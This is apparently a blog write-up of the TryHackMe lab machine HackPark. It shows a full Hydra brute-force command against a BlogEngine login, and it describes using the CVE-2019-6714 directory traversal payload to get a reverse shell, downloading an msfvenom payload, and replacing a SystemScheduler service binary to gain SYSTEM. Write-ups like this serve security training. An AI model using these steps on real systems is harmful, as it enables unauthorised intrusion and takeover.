TryHackMe HackPark Machine Writeup

I subscribed to TryHackMe long back but recently started to work on the machines. I found the THM guys are doing a great job and I believe in few months they will be in the direct compilation with HackTheBox. They are getting new users subscribed in large numbers as the word-of-mouth started to spread in the Cyber Security forums and users started to publish their write-ups. The THM approach is much different from HTB, well, at least there are no restrictions.

So here is my first full public write-up of TryHackMe new Windows machine called HackPark. Note that, this machine available in subscriber only labs, doesn’t available for the free subscribers. You can always subscribe to free labs where you will find a good number of exploitable machines.

The HackPark is the Windows machine. The target is to brute force a website’s login page using Hydra, using RCE and WinPEAS and identify and use a public exploit then escalate the privileges to gain access to system administrator account.

NMAP SCANNING

The NMAP Scan reveled a couple of open ports, I visit the website and the answer for first flag was on the home page.

Find the login page and find the web server request method.

Getting the 1st flag is too basic, we need to find a login page to attack and identify what type of request the form is making to the web server. I used the GoBuster to find the login page and used Burp suite to find the web server request type.

Brute force the Login page to get the Admin password

The website is running using the BloggerEngine, a quick Google search showed me the default user is “Admin”. So I used the Hydra to do the rest and successfully obtained the password.

# root @ ns09 in ~/thm/hackpark [11:42:15] 
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.96.114 http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=pkSueCvXAtRbGCRvc8gmQx32k%2F7OgbrjjMiFv7aMQSGeYpgaB%2FFOFiwLIcAXoZs%2FdS19k6vXj7GcRldN8Ez5D3He1PAiWSKHvUumRHPRccTMNbcmhH0NYiJzSBmHF6kUVTfjVflEYgeBSsMIKJ2P0n%2BV4kKLEMfHEoMXGrHxt7BKy8eEL6zMEICvBiR1iD8bP7qGe4%2FCT2J8Tw5Mj9JDpiO%2FCpAtF02aF25L%2Bhsop5q83ZwG4eQwkZYYxnylaBjW5TaZKFThE1uhPkauUHA8dSehRd7cTKK5KevlMK7WH2fPID0HMZAqPdSRAIx%2Fx1UODOrlzV%2FE37YO6ndHb7HaTi91fgoJycnIaDqnrNbFTDABlFmL&__EVENTVALIDATION=iLyHW76WtnmnF2vmdD0CcHD00zRe0gSqUWwKHdlt%2FLfESv60EKUDd8gk6W3%2BErpGxSjFfExyfxMS%2B%2BbPQ4C8eMxGW4Iq7aPcskxlrdb2oNhwpzphp9pggL%2BCn1ER4TpHQH%2BOqhPdzDbdaHaQeU5nzaIGEQKZLWQx8%2BqpwlmL1sooponz&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login Failed"
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-26 11:42:18
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.96.114:80/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=pkSueCvXAtRbGCRvc8gmQx32k%2F7OgbrjjMiFv7aMQSGeYpgaB%2FFOFiwLIcAXoZs%2FdS19k6vXj7GcRldN8Ez5D3He1PAiWSKHvUumRHPRccTMNbcmhH0NYiJzSBmHF6kUVTfjVflEYgeBSsMIKJ2P0n%2BV4kKLEMfHEoMXGrHxt7BKy8eEL6zMEICvBiR1iD8bP7qGe4%2FCT2J8Tw5Mj9JDpiO%2FCpAtF02aF25L%2Bhsop5q83ZwG4eQwkZYYxnylaBjW5TaZKFThE1uhPkauUHA8dSehRd7cTKK5KevlMK7WH2fPID0HMZAqPdSRAIx%2Fx1UODOrlzV%2FE37YO6ndHb7HaTi91fgoJycnIaDqnrNbFTDABlFmL&__EVENTVALIDATION=iLyHW76WtnmnF2vmdD0CcHD00zRe0gSqUWwKHdlt%2FLfESv60EKUDd8gk6W3%2BErpGxSjFfExyfxMS%2B%2BbPQ4C8eMxGW4Iq7aPcskxlrdb2oNhwpzphp9pggL%2BCn1ER4TpHQH%2BOqhPdzDbdaHaQeU5nzaIGEQKZLWQx8%2BqpwlmL1sooponz&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login Failed
[STATUS] 1158.00 tries/min, 1158 tries in 00:01h, 14343241 to do in 206:27h, 16 active
[80][http-post-form] host: 10.10.96.114   login: admin   password: *****
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-26 11:43:38

Compromise The Machine

In this step, I had to identify and execute a public exploit from exploit-db.com to get initial access on this Windows machine. As I already logged-in as Admin, I went ahead to find the version of the BlogEngine. It wasn’t difficult, I found it in the about section.

The BlogEngine version 3.3.6.0 is known for its Directory Traversal and Remote Code Execution (RCE) vulnerability (CVE-2019-6714).

Gaining Initial Shell

I copy the exploit code in to my THM working directory of HackPark and created a new file called PostView.ascx and paste the content. And change the client IP and port as per my requirement.

I opened another terminal window and start my listener.

Next, I opened the blog-post (Welcome to HackPack) and I need to upload the modified file PostView.ascx using file manager within the post edit options and then run this from the url: ?theme=../../App_Data/files

I receved the connection back in my listner as IIS AppPooBlog

Privilege Escalation

I made a shell using MSFVenom

Host a Python SimpleHTTPserver

Import the shell I just created using PowerShell Invoke-WebRequest command.

I run the reverse shell commands in my Metasploit handler.

As soon as I run the .\shell.exe from the terminal I have the meterpreter shell opened.

I import the winPEAS same way as I import my shell.exe in to the machine. I run it from proper shell to find the processes running. The exploitable service is Message.exe,

I next moved the Shell.exe file in to SystemSheduler directory and then renamed the process Message.exe as Message.bak and then I renamed Shell.exe to Message.exe

c:\Program Files (x86)\SystemScheduler> mv Message.exe Message.back
 mv Message.exe Message.back
'mv' is not recognized as an internal or external command,
operable program or batch file.

c:\Program Files (x86)\SystemScheduler>rename Message.exe Message.bak
rename Message.exe Message.bak

c:\Program Files (x86)\SystemScheduler>rename shell.exe Message.exe
rename shell.exe Message.exe

And then I exit the Current Meterpreter session and back to MSF Multihandler and run the Shell command again, This took around 30 seconds to get me the meterpreter shell as System.

Original Install Time:

Root.txt

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

You may also like...

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
Sorry, that action is blocked.